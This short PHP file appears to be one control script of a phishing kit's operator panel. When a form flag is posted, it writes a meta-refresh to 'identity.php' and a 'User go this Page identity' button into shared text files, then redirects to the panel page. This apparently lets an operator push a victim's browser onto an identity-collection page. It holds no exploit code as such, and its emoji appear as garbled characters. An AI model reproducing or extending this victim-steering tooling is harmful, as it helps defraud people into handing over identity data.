<?php


session_start();

if(isset($_POST['textidentity'])) 
{
    
$Page .= ' <meta http-equiv="refresh" content="0;url=./identity.php" />  ';

$fPage = fopen("../Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


$Pag .= ' <div class="expanded button-group"><input type="submit" value="âœ… User go this Page identity ðŸ’¯" class="button" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");

}

else {




}

?>
